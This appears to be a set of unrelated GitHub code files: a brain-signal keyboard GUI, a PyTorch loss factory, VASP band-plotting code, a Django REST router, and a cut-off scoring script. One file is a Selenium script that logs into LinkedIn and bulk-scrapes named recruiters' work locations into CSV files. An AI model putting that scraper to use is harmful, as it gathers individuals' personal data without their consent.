{\"111111\":\"1\",\"111011\":\"2\",\"11011\":\"3\",\"10111\":\"4\",\"10011\":\"5\",\"011111\":\"6\",\"011011\":\"7\",\"01011\":\"8\",\"00111\":\"9\",\"00011\":\"0\",\"111110\":\"q\",\"111010\":\"w\",\"11010\":\"e\",\"10110\":\"r\",\"10010\":\"t\",\"011110\":\"y\",\"011010\":\"u\",\"01010\":\"i\",\"00110\":\"o\",\"00010\":\"p\",\"111101\":\"a\",\"111001\":\"s\",\"11001\":\"d\",\"10101\":\"f\",\"10001\":\"g\",\"011101\":\"h\",\"011001\":\"j\",\"01001\":\"k\",\"00101\":\"l\",\"00001\":\";\",\"111100\":\"z\",\"111000\":\"x\",\"11000\":\"c\",\"10100\":\"v\",\"10000\":\"b\",\"011100\":\"n\",\"011000\":\"m\",\"01000\":\",\",\"00100\":\".\",\"00000\":\"?\"}\nres = \"\"\n\ndef 
split():\n global timest\n global x0,x1,y0,y1\n while(True):\n # print(\"Switch\")\n if x0!=x1:\n midx = (x0+x1)//2\n if(timest):\n timest = 0\n xx = x1\n x1 = midx\n draw()\n x1 = xx\n else:\n timest = 1\n xx = x0\n x0 = midx+1\n draw()\n x0 = xx \n elif y0!=y1:\n midy = (y0+y1)//2\n if(timest):\n timest = 0\n yy = y1\n y1 = midy\n draw()\n y1 = yy\n else:\n timest = 1\n yy = y0\n y0 = midy+1\n draw()\n y0 = yy\n time.sleep(2)\n while(clicking):\n time.sleep(0.01)\n\ndef click():\n global x0,y0,x1,y1,start_t,res\n res+=str(timest)\n if x0!=x1:\n midx = (x0+x1)//2\n if(timest):\n x1 = midx\n else:\n x0 = midx+1\n elif y0!=y1:\n midy = (y0+y1)//2\n if(timest):\n y1 = midy\n else:\n y0 = midy+1\n\ndef draw_circle():\n global status # use the global keyword to access the outer status variable\n canvas.delete(\"circle\") # clear the previously drawn dot\n x = canvas.winfo_reqwidth() - 30 # x coordinate of the top-right corner\n y = canvas.winfo_reqheight() - 30 # y coordinate of the top-right corner\n\n if status == -1:\n canvas.create_oval(x, y, x + 20, y + 20, fill=\"red\", outline=\"red\", tags=\"circle\")\n elif status == 1:\n canvas.create_oval(x, y, x + 20, y + 20, fill=\"green\", outline=\"green\", tags=\"circle\")\n elif status == 2:\n canvas.create_oval(x, y, x + 20, y + 20, fill=\"gray\", outline=\"gray\", tags=\"circle\")\n\ndef read_output():\n global status\n reset()\n while True:\n output_line = process.stdout.readline()\n if not output_line:\n # continue\n break\n if output_line == \"PoorSignal\\n\":\n status = -1\n elif output_line == \"GreatSignal\\n\":\n status = 1\n elif output_line == \"Click!\\n\": \n status = 2\n click()\n draw()\n status = 2\n if x0==x1 and y0==y1:\n print(res)\n try:\n print(tab[res])\n except:\n print(\"Error\")\n reset()\n elif output_line == \"Cd_ends\\n\" and status != -1 :\n status = 1\n\n print(\"stdout:\", output_line, end=\"\")\n label_1.config(text=output_line)\n label_1.update()\n draw_circle()\n \n\nexe_path = \"main.exe\" ###\nprocess = subprocess.Popen(exe_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n\nwindow = tk.Tk()\nwindow.title('test')\nwindow.geometry('1260x600')\nwindow.configure(background='white')\n# print(\"hello!\")\n\n\n# text area at the top\ntext_area = tk.Text(window, height=10, width=60)\ntext_area.pack(side=tk.TOP)\n\nmain_canva = tk.Canvas(window, width=900, height=360)\nmain_canva.pack(side=tk.BOTTOM)\n\n\n# image at the bottom\nimage = PhotoImage(file=\"keyborad.png\")\nimage_item = main_canva.create_image(450,200,image=image) # image centered at x = 450, y = 200\n\nrectg = main_canva.create_rectangle(60, 100, 845, 300, outline=\"blue\", width=4,tags=\"rectangle\")\n# one grid cell is 78.5 px (x) by 50 px (y)\n\ndef reset():\n global res,x0,y0,x1,y1\n res = \"\"\n x0 = 0\n y0 = 0\n x1 = 9\n y1 = 3\ndef draw():\n global x0,y0,x1,y1\n main_canva.delete(\"rectangle\")\n rectg = main_canva.create_rectangle(60+x0*78.5, 100+y0*50, 845-(9-x1)*78.5, 300-(3-y1)*50, outline=\"blue\", width=4,tags=\"rectangle\")\n\n\n# main_canva.tag_raise(rectg)\n\nframe_1 = tk.Frame(window)\nframe_1.pack(side=tk.BOTTOM, anchor=tk.SE)\n\nlabel_1 = tk.Label(frame_1, text='OUTPUT')\nlabel_1.pack(side=tk.TOP)\n\ncanvas = tk.Canvas(frame_1, width=30, height=30) # create a small Canvas to hold the status dot\ncanvas.pack(side=tk.TOP)\ndraw_circle() # draw the dot initially\n\nframe_2 = tk.Frame(window)\n\ndef mainloop_with_catch():\n try:\n window.mainloop()\n except KeyboardInterrupt:\n window.destroy()\n # wait for the subprocess to finish\n process.wait()\n # get the subprocess exit code\n exit_code = process.returncode\n print(\"exit code:\", exit_code)\n\n# a global flag marking whether the subprocess has finished\nprocess_completed = False\n\n# start the thread that reads the subprocess output\nt = threading.Thread(target=read_output)\nt2 = 
threading.Thread(target=split)\nt.start()\nt2.start()\n\nmainloop_with_catch()\n\n# 等待子進程完成\nwhile not process_completed:\n pass\n","repo_name":"fishhh0710/YTP_mindwave","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18137244582","text":"import torch as th\nfrom .dice import DiceLoss\n\ndef create_loss(args):\n name = args.loss.lower()\n\n if name == 'l1':\n from torch.nn import L1Loss\n loss = L1Loss(reduction='sum')\n\n elif name == 'l2':\n from torch.nn import MSELoss\n loss = MSELoss(reduction='sum')\n\n elif name == 'bce':\n from torch.nn import BCELoss\n loss = BCELoss(reduction='sum')\n \n elif name == 'diceloss':\n loss = DiceLoss()\n else:\n raise ValueError('loss must be one of l1, l2, bce,diceloss')\n\n return loss\n\n# def dice_loss(probs,target):\n# \"\"\"\n# input is a torch variable of size BatchxnclassesxHxWxD representing log probabilities for each class\n# target is a 1-hot representation of the groundtruth, shoud have same size as the input\n# \"\"\"\n# eps = 1e-6\n# dims = (2,3,4)\n\n# intersection = th.sum(probs*target,dims)\n# cardinality = th.sum(probs+target,dims)\n# dice_score = 2. * intersection/(cardinality+eps)\n# return th.mean(1-dice_score)","repo_name":"nickioan/pytorch_network_architectures","sub_path":"loss/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27387218538","text":"# Anthony Yoshimura\n# 09/03/18\n\nfrom numpy import arange, array, zeros, cross, dot, pi, transpose, sort, append\nfrom numpy.linalg import norm\nfrom getChemForm import getChemForm\nimport matplotlib.pyplot as plt \nimport os\nfrom plotBS import getFermiEnergy, getRecipLattice, getBandGap\nfrom plotEnCon import getPaths\n\nblue_list = [(1, .5, 0), (.2, .2, 1), (.2, .2, .8), (.2, .2, .6), (.2, .2, .4)] \n\ndef getDirectories(targFiles = ['EIGENVAL', 'POSCAR', 'DOSCAR'], top = '.'):\n \"\"\"\n returns a list of directories that contain desired files\n file_list: list of files that directories must contain (list of str)\n \"\"\"\n if type(targFiles) == str:\n targFiles = [targFiles]\n\n dir_list = []\n for root, dirs, files in os.walk(top):\n soFarSoGood = True\n for targFile in targFiles:\n if targFile not in files: \n soFarSoGood = False\n break\n if soFarSoGood:\n dir_list.append(root)\n\n return dir_list\n\n\ndef getEigenvalTab(\n EIGENVAL = 'EIGENVAL',\n DOSCAR = 'DOSCAR',\n kpoint = [1/3, 1/3, 0],\n printInfo = False,\n atomsPerCell = 3,\n walk = True,\n ):\n \"\"\"\n returns table containing number of atoms and eigenvalues at specified k-point \n EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n \"\"\"\n # get paths for EIGENVAL, POSCAR, and DOSCARs\n if walk:\n EIGENVAL_list = getPaths(EIGENVAL)\n DOSCAR_list = getPaths(DOSCAR)\n else:\n EIGENVAL_list = [EIGENVAL]\n DOSCAR_list = [DOSCAR]\n\n # get eigenvalues belonging to desired k-point from EIGENVALs\n eigenval_tab = []\n for EIGENVAL, DOSCAR in zip(EIGENVAL_list, DOSCAR_list):\n\n # get Fermi energies from DOSCAR\n with open(DOSCAR) as f:\n efermi = getFermiEnergy(DOSCAR, printInfo = False)\n\n # get eigenvalues from EIGENVAL\n if printInfo:\n print('getting 
eigenvalues from %s' %EIGENVAL)\n with open(EIGENVAL) as f:\n\n # get number of atoms and bands\n natoms = int(f.readline().split()[0])\n if natoms < 4:\n natoms = 0 # zero Ga atoms in pristine cell\n\n for n in range(4):\n f.readline()\n nelect, nkpts, nbands = [int(val) for val in f.readline().split()]\n if printInfo:\n print('nelect = %s, natoms = %s, nbands = %s' %(nelect, natoms, nbands))\n\n # if more than k-point was used, find point closest to the desired k-point\n if nkpts > 1:\n for line in f:\n line_list = line.split()\n if len(line_list) == 4:\n trialKpoint = [float(val) for val in line_list[:-1]]\n \n # check if it's the correct k-point\n match = True \n for desiredComp, trialComp in zip(kpoint, trialKpoint):\n dif = abs(desiredComp - trialComp)\n if abs(desiredComp - trialComp) > 0.001:\n match = False\n break\n \n # break from loop when k-point is found\n if match:\n break\n\n # if only one k-point was used\n else:\n f.readline()\n line_list = f.readline().split()[:-1]\n trialKpoint = [float(val) for val in line_list[:-1]]\n\n if printInfo:\n print('taking eigenvalues at %s' %trialKpoint)\n \n # get eigenvalues\n eigenval_list = [float(f.readline().split()[1]) for n in range(nbands)]\n \n # add to eigenvalue table\n eigenval_tab.append((int(natoms / atomsPerCell), eigenval_list, efermi))\n\n return eigenval_tab\n \n\ndef getBars(\n ebounds = [-4, 0.75],\n kpoint = [1/3, 1/3, 0],\n printInfo = False,\n thres = 0.3628, #eV (default for Ga-doping project)\n getPris = True,\n prisRoot = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands',\n ):\n \"\"\"\n returns dictionary of energy ranges for bars representing vbm, cbm, and midgap states\n EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n thres: threshold for gap in eV (float)\n getPris: if True, gets energy ranges from pristine system\n root: directory containing VASP output files for pristine system\n \"\"\"\n eigenval_tab = getEigenvalTab('EIGENVAL', 'DOSCAR', kpoint, printInfo)\n emin, emax = ebounds\n emax += 1.5 # make sure conduction band goes above top of plot\n\n # get eigenvalues from pristine system\n if getPris:\n EIGENVAL = '%s/%s' %(prisRoot, 'EIGENVAL')\n DOSCAR = '%s/%s' %(prisRoot, 'DOSCAR')\n eigenval_tab += getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo, walk = False)\n \n # get all eigenvalues below top directory\n bar_dict = {}\n for natoms, eigenval_list, efermi in eigenval_tab:\n\n # use larger thres for pristine system\n if natoms == 0:\n thres = 1.6\n\n # find of energy ranges in which eigenvalues are closely spaced\n top_list = []\n bot_list = [emin]\n for n in range(len(eigenval_list) - 1):\n thisEig = eigenval_list[n]\n nextEig = eigenval_list[n + 1]\n\n # only look at eigenvalues within ebounds\n if thisEig > emin and thisEig < emax:\n if nextEig - thisEig > thres:\n top_list.append(thisEig)\n bot_list.append(nextEig)\n \n # restore original threshold value\n if natoms == 0:\n thres -= 1.5\n\n top_list.append(emax)\n \n bar_dict[natoms] = top_list, bot_list, efermi\n\n return bar_dict\n\n\ndef getEdges(\n ebounds = [-4, 0.75],\n thres = 0.1356, #eV (default for Ga-doping project)\n printInfo = False,\n getPris = True,\n prisRoot = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands',\n ):\n \"\"\"\n returns dictionary containing band edges in eV within deired energy range\n 
EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n thres: threshold for gap in eV (float)\n getPris: if True, gets energy ranges from pristine system\n root: directory containing VASP output files for pristine system\n \"\"\"\n # get list of directories containing required files\n root_list = getDirectories(targFiles = ['EIGENVAL', 'DOSCAR'], top = '.')\n\n # get pristine band edges\n if getPris:\n root_list.append(prisRoot)\n\n # dictionary containing edge values\n edge_dict = {}\n\n # loop through root directories\n for root in root_list:\n DOSCAR = '%s/DOSCAR' %root\n EIGENVAL = '%s/EIGENVAL' %root\n\n # get Fermi level from DOSCAR\n efermi = getFermiEnergy(DOSCAR, printInfo = False)\n \n # obtain eigenvalues along k-path from EIGENVAL\n if printInfo:\n print('getting eigenvalues from %s' %EIGENVAL)\n\n with open(EIGENVAL, 'r') as f:\n \n # get number or atoms and bands\n natoms = int(int(f.readline().split()[0]) / 3)\n if natoms < 4:\n natoms = 0\n print('natoms = %s' %natoms)\n\n for i in range(4): # useful info starts at line 6\n f.readline()\n \n # number of electrons, kpoints, and bands\n nelect, nkpts, nbands = [int(val) for val in f.readline().split()]\n if printInfo:\n print('nelect = %s, natoms = %s, nbands = %s' %(nelect, natoms, nbands))\n \n # place holders\n eigenval_tab = [] # lists of eigenvalues at every kpoint\n \n # get eigenvalues and kpath distances\n for i in range(nkpts):\n for n in range(2): # skips k-points lines before eigenvals\n f.readline()\n \n # record eigenvalues at current kpoint\n eigenval_list = []\n for j in range(nbands):\n eigenval = float(f.readline().split()[1])\n eigenval_list.append(eigenval)\n \n eigenval_tab.append(eigenval_list)\n \n # transpose table into list of bands to plot in pyplot\n band_tab = transpose(eigenval_tab)\n \n # find band maxima and minima\n max_list = array([band.max() for band in band_tab])\n min_list = array([band.min() for band in band_tab])\n \n # find all bands in ebounds\n lowerBound, upperBound = ebounds\n \n # find lowest band in ebounds\n for index, en in enumerate(min_list):\n if en > lowerBound:\n lowestIndex = index\n break\n \n # find highest band in ebounds\n for index, en in enumerate(reversed(max_list)):\n if en < upperBound:\n highestIndex = nbands - index\n break\n if highestIndex == nbands:\n highestIndex -= 1 # ensure that search for cbm stays in bounds of min_list\n \n # find highest cbm and lowest vbm\n if printInfo:\n print('searching for gap in bands %s through %s' %(lowestIndex, highestIndex))\n top_list = [] # top of band (bottom of gap)\n bot_list = [] # bottom of band (top of gap)\n for index in range(lowestIndex, highestIndex):\n vbm = max_list[index]\n cbm = min_list[index + 1]\n bandgap = cbm - vbm\n if bandgap > thres:\n if printInfo:\n print('found gap of size %s eV above band %s' %(bandgap, index))\n top_list.append(vbm)\n bot_list.append(cbm)\n \n vbm, cbm = min(top_list), max(bot_list)\n print('vbm = %s, cbm = %s' %(vbm, cbm))\n edge_dict[natoms] = vbm, cbm\n\n return edge_dict\n\n\ndef getGaps(\n bar_dict,\n edge_dict,\n ):\n \"\"\"\n returns dictionary containing band gaps in eV within deired energy range\n bar_dict: output of getBars (dict)\n edge_dict: output of getEdges (dict)\n \"\"\"\n gap_dict = {}\n\n for natoms in bar_dict:\n top_list, bot_list, efermi = bar_dict[natoms]\n vbm, cbm = edge_dict[natoms]\n\n # get indirect gap\n indGap = cbm - vbm\n\n # find top closest to vbm\n minDist = indGap\n for top in top_list:\n dif = abs(vbm - top)\n if 
dif < minDist:\n minDist = dif\n dVbm = top\n\n # find bottom closest to cbm\n minDist = indGap\n for bot in bot_list:\n dif = abs(cbm - bot)\n if dif < minDist:\n minDist = dif\n dCbm = bot\n \n # get direct gap\n dGap = dCbm - dVbm\n\n gap_dict[natoms] = dGap, indGap\n\n return gap_dict\n\n\ndef plotBars(\n ebounds = [-4, 0.75],\n kpoint = [1/3, 1/3, 0],\n printInfo = False,\n showFermi = True,\n showGaps = True,\n barThres = 0.3628, # eV (default for Ga-doping project)\n edgeThres = 0.1356,\n color_list = 'auto',\n width = 0.9,\n figsize = [6,5],\n save = False,\n outfile = 'bars.pdf',\n ):\n \"\"\"\n plots eigenvalues for various concentrations\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n showFermi: if True, fermi levels are plotted as black dashed lines (bool)\n showGaps: if True, gap values are shown underneath the cbm's (bool)\n barThres: energy threshold above which an unoccupied region is considered a gap (float)\n edgeThres: energy threshold above which an unoccupied region is considered a gap (float)\n \"\"\"\n # UNDER CONSTRUCTION:\n # * length of faded bar extensions and positions of gap values\n # depend on edgeThres, which shouldn't be the case!\n # * gaps and concentrations should round with correct number of\n # sig figs. Right now it is tailored to work for G a-doping\n bar_dict = getBars(ebounds, kpoint, printInfo, barThres)\n edge_dict = getEdges(ebounds, edgeThres, printInfo) # small thres to count all gaps\n gap_dict = getGaps(bar_dict, edge_dict)\n numBars = len(bar_dict)\n\n # sort number of atoms corresponding to ascending Ga concentration\n natoms_list = [natoms for natoms in bar_dict]\n natoms_list.sort(reverse = True)\n natoms_list.insert(0, natoms_list.pop(-1))\n\n # label bars with Ga concentration %\n label_list = []\n for natoms in natoms_list:\n if natoms == 0:\n label_list.append('0.00')\n else:\n label = str(100 / natoms)\n label += '000'\n label_list.append('%.4s' %label)\n \n # prepare figure\n fig, ax = plt.subplots()\n \n # plot bars and edges labelled by ascending Ga concentration\n for natoms, n in zip(natoms_list, range(numBars)):\n\n print('natoms = %s' %natoms)\n\n # plot bars\n top_list, bot_list, efermi = bar_dict[natoms]\n\n # same color for each concentration\n if color_list == 'auto':\n barColor = next(ax._get_lines.prop_cycler)['color']\n else:\n barColor = color_list[n]\n \n # plot bars\n for top, bot in zip(top_list, bot_list):\n print('bot = %s, top = %s' %(bot, top))\n ax.bar(left = n, height = top - bot, width = width + .05, bottom = bot,\n color = barColor)\n\n # plot edges if they are significantly different from a bar's edge\n vbm, cbm = edge_dict[natoms]\n endPointsX = [n - width/2, n + width/2]\n barEdges_list = top_list + bot_list\n\n # check if indirect gap is significatnly smaller than bars' gap\n tracker = 0 # distinguish vbm from cbm\n for bandEdge in [vbm, cbm]:\n tracker += 1\n significant = True\n for barEdge in barEdges_list:\n dif = abs(bandEdge - barEdge)\n if dif < 0.01:\n significant = False\n break\n\n # plot faded extension to bar showing true band edge\n if significant:\n if tracker % 2 == 0:\n print('plotting a cbm extension')\n bot, top = bandEdge, bandEdge + 0.5\n\n else:\n print('plotting a vbm extension')\n bot, top = bandEdge - 0.5, bandEdge\n\n ax.bar(left = n, height = top - bot, width = width + .05, bottom = bot,\n color = barColor, zorder = -1, alpha = .4)\n\n # plot fermi levels\n if showFermi:\n 
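# plot the Fermi level as a dashed red line spanning the width of this bar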
endPointsY = [efermi, efermi]\n ax.plot(endPointsX, endPointsY, color = 'red', linewidth = 2, linestyle = 'dashed')\n\n # show band gap values\n if showGaps:\n dGap, indGap = gap_dict[natoms]\n xpos = n\n ypos = cbm - .05\n text = '%.3g eV' %dGap\n\n if abs(dGap - indGap) > 0.05:\n text = '%.3g (%.4s)' %(dGap, indGap)\n ax.text(xpos, ypos, text, va = 'top', ha = 'center', fontsize = 11)\n\n # figure properties\n ax.set_ylim(ebounds)\n# ax.set_title('Energy bands at K in Ga-doped WS$_2$', fontsize = 14)\n ax.set_xlabel('Ga Concentration (%)', fontsize = 12)\n ax.set_ylabel('Energy (eV)', fontsize = 12)\n ax.set_xticks(arange(numBars))\n ax.set_xticklabels(label_list, fontsize = 12)\n\n plt.tight_layout()\n if save:\n plt.savefig(outfile)\n\n plt.show()\n\n\ndef plotPoints(\n ebounds = [-4, 0.75],\n EIGENVAL = 'EIGENVAL',\n DOSCAR = 'DOSCAR',\n kpoint = [1/3, 1/3, 0],\n printInfo = True,\n scale = 'linear',\n save = False,\n outfile = 'eigevalues.pdf',\n ):\n \"\"\"\n plots eigenvalues for various concentrations\n EIGENVAL: EIGENVAL file (str)\n POSCAR: POSCAR file (str)\n DOSCAR: DOSCAR file (str)\n kpoint: k-point at which eigenvalues are read (list of 3 floats)\n printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n \"\"\"\n eigenval_tab = getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo)\n root = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands'\n EIGENVAL = '%s/%s' %(root, EIGENVAL)\n DOSCAR = '%s/%s' %(root, DOSCAR)\n prisEigenval_tab = getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo, walk = False)\n eigenval_tab += prisEigenval_tab\n\n fig, ax = plt.subplots()\n \n for natoms, eigenval_list in eigenval_tab:\n \n print('natoms = %s' %natoms)\n if natoms > 0:\n con_list = [100/natoms for n in range(len(eigenval_list))] \n else:\n con_list = [0 for n in range(len(eigenval_list))]\n\n ax.plot(con_list, eigenval_list, 'bo')\n\n if scale == 'log':\n ax.set_xscale(\"log\", nonposx='clip')\n ax.set_ylim(ebounds)\n ax.set_title('Eigenvalues at K in Ga-doped WS$_2$', fontsize = 14)\n ax.set_xlabel('Ga concentration (%)', fontsize = 12)\n ax.set_ylabel('eigenvalues (eV)', fontsize = 12)\n\n if save:\n plt.savefig(outfile)\n\n plt.show()\n \n#------------------------------- SCRATCH ---------------------------------------------\n # get Fermi energies from DOSCARs\n# efermi_list = [getFermiEnergy(DOSCAR) for DOSCAR in DOSCAR_list]\n\n # print('dif = %s' %dif)\n# eigenval_dict[EIGENVAL.split('/')[1]] = natoms, eigenval_list\n\n # find band whose maxima is closest to but less than the fermi energy\n# vbDif = max_list.max() - min_list.min()\n# for en in max_list:\n# newVbDif = efermi - en\n# if newVbDif > 0:\n# vbDif = newVbDif\n# vbm = en\n# else:\n# break\n#\n# # find band index that contains vbm\n# vbmBand = max_list.tolist().index(vbm)\n \n#def getPrisBars(\n# ebounds = [-4, 1.75],\n# EIGENVAL = 'EIGENVAL',\n# DOSCAR = 'DOSCAR',\n# kpoint = [1/3, 1/3, 0],\n# printInfo = True,\n# thres = 0.3, #eV\n# ):\n# \"\"\"\n# gets energy ranges for bars representing vbm, cbm, and midgap states\n# EIGENVAL: EIGENVAL file (str)\n# POSCAR: POSCAR file (str)\n# DOSCAR: DOSCAR file (str)\n# kpoint: k-point at which eigenvalues are read (list of 3 floats)\n# printInfo: if True, prints band gaps and Fermi energies as they are read (bool)\n# thres: threshold for gap in eV (float)\n# \"\"\"\n# root = '/Users/anthonyyoshimura/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands'\n## EIGEVAL = '~/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands/%s' %EIGENVAL\n## EIGEVAL = 
'~/Desktop/meunier/ionIrrad/tmd/WS2_optb88/bands/%s' %EIGENVAL\n# EIGENVAL = '%s/%s' %(root, EIGENVAL)\n# DOSCAR = '%s/%s' %(root, DOSCAR)\n# eigenval_tab = getEigenvalTab(EIGENVAL, DOSCAR, kpoint, printInfo, walk = False)\n# \n# emin, emax = ebounds\n#\n# top_tab = []\n# bot_tab = []\n# natoms_list = []\n# bar_dict = {}\n# for natoms, eigenval_list in eigenval_tab:\n## for natoms in eigenval_tab:\n## eigenval_list = eigenval_tab[natoms]\n#\n# # find of energy ranges in which eigenvalues are closely spaced\n# top_list = []\n# bot_list = [emin]\n# for n in range(len(eigenval_list) - 1):\n# thisEig = eigenval_list[n]\n# nextEig = eigenval_list[n + 1]\n# if thisEig > emin and thisEig < emax:\n# if nextEig - thisEig > thres:\n# top_list.append(thisEig)\n# bot_list.append(nextEig)\n#\n# top_list.append(emax)\n# top_tab.append(top_list)\n# bot_tab.append(bot_list)\n# natoms_list.append(natoms)\n# \n# bar_dict[0] = top_list, bot_list\n#\n## return top_tab, bot_tab, natoms_list, bar_dict\n# return bar_dict\n#\n#\n\n# color = barColor, zorder = -1, alpha = .4, edgecolor = barColor)\n# endPointsY = [bandEdge, bandEdge]\n# ax.plot(endPointsX, endPointsY, color = barColor, linewidth = 2)\n\n# color = barColor, edgecolor = barColor)\n\n# elif natoms > 10:\n# label_list.append('%.4s' %(100 / natoms))\n# else:\n# label_list.append('%.3s' %(100 / natoms)) # hide trailing decimal\n","repo_name":"yoshimuraanthony/vasp","sub_path":"plotEigenvals.py","file_name":"plotEigenvals.py","file_ext":"py","file_size_in_byte":20858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2563739921","text":"from asset import rest_views\nfrom rest_framework import routers\nfrom asset import views as asset_views\nfrom django.conf.urls import url, include\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', rest_views.UserViewSet)\nrouter.register(r'assets', rest_views.AssetViewSet)\nrouter.register(r'servers', rest_views.ServerViewSet)\n\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'asset_list/$', rest_views.AssetList),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^dashboard_data/', asset_views.get_dashboard_data, name=\"get_dashboard_data\"),\n]\n","repo_name":"a-mac-user/Ragtime","sub_path":"asset/rest_urls.py","file_name":"rest_urls.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"70572511404","text":"from collections import defaultdict\nimport pandas as pd\nimport numpy as np\nfrom time import sleep\nimport glob\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nimport chromedriver_binary\nfrom bs4 import BeautifulSoup\n\nimport mongo\nfrom companies import cos_list\n# import scroll\n\ndef get_login():\n '''\n Access keys from external file and placed in a list.\n\n Parameters\n ----------\n None:\n\n Returns\n ----------\n creds: (list)\n Return keys used for session.\n '''\n f = open('../data/LI_login.txt', 'r')\n creds = f.readlines()\n\n for idx, key in enumerate(creds):\n creds[idx] = key.replace('\\n', '')\n\n return creds\n\ndef login():\n '''\n Login into LinkedIn and webdriver session for more web 
manipulation.\n Keys generated from get_login() function.\n\n Parameters\n ----------\n None:\n\n Returns\n ----------\n driver: (selenium.webdriver.chrome.webdriver.WebDriver)\n Return webdriver session for web manipulation.\n '''\n # session keys for LI instance\n email, pw = get_login()\n \n # selenium webdriver\n driver = webdriver.Chrome()\n driver.get('https://www.linkedin.com/')\n # log in\n sleep(2)\n driver.find_element_by_id('session_key').send_keys(email)\n sleep(1)\n driver.find_element_by_id('session_password').send_keys(pw+Keys.RETURN)\n\n return driver\n\ndef scrape_location(driver, url, frame=None):\n '''\n Go to LinkedIn user's URL and scrape work location.\n \n Parameters\n ----------\n driver: (selenium.webdriver.chrome.webdriver.WebDriver)\n Selenium Chrome Webdriver for site interaction.\n url: (str)\n LinkedIn user's URL.\n\n Returns\n ----------\n location: (str)\n Return string of LinkedIn user's work location.\n '''\n sleep(5)\n # frame.to_csv('../data/tech_rec/_techrecruiters_with_location.csv', mode='a', index=False)\n # sleep(3)\n driver.get(url)\n r = driver.page_source\n soup = BeautifulSoup(r, 'html.parser')\n flex_card = soup.find('div', 'flex-1 mr5')\n try:\n location = flex_card.find('li', 't-16 t-black t-normal inline-block')\n if location == None:\n return 'Information not provided.'\n except:\n return '404'\n location = location.text.lstrip().rstrip()\n # frame['location'].append(location, ignore_index=True)\n sleep(3)\n # frame.to_csv('../data/techrecruiters_with_location.csv', mode='a')\n\n return location\n\ndef main():\n '''\n Open local CSVs into one DataFrame, scrape LinkedIn users work location and \n append to original Dataframe. Save new DataFrame to local CSV.\n\n Parameters\n ----------\n None:\n\n Returns\n ----------\n None:\n '''\n path = '../data/tech_rec'\n all_files = glob.glob(path + \"/*.csv\")\n csv_name = '../data/tech_rec/_techrecruiters_with_location.csv'\n lst = []\n # scroll.main()\n \n #TODO: functionize\n for filename in all_files:\n df = pd.read_csv(filename, index_col=None, header=0, names=['recruiter', 'url'])\n co_name = filename\n co_name = co_name.split('/')[-1]\n co_name = co_name[:-4]\n df['co_name'] = co_name\n lst.append(df)\n \n frame = pd.concat(lst, axis=0, ignore_index=True)\n frame['location'] = ''\n df = pd.DataFrame(columns=frame.columns)\n\n if not os.path.exists(csv_name):\n df.to_csv(csv_name, index=False)\n\n driver = login()\n #TODO: functionize\n for idx, row in frame[2202:3200].iterrows():\n location = scrape_location(driver, row['url'])\n row['location'] = location\n df = df.append(row)\n print(df.loc[idx:])\n df.loc[idx:].to_csv(csv_name, mode='a', index=False, header=False)\n \n driver.close()\n\nif __name__ == '__main__':\n main()","repo_name":"DatamancerZKSB/gal-career-partners","sub_path":"src/tech_rec_location.py","file_name":"tech_rec_location.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17142321350","text":"import argparse\nimport os\nfrom scoring_utils import get_score, get_mar_transcription_mapping\nfrom glob import glob\nimport numpy as np\n\nparser = argparse.ArgumentParser(\n description='scoring script for text localization')\nparser.add_argument('reference', type=str,\n help='reference directory of test data, contains np array')\nparser.add_argument('hypothesis', type=str,\n help='hypothesis directory of test data, contains np array')\nparser.add_argument('result', type=str,\n 
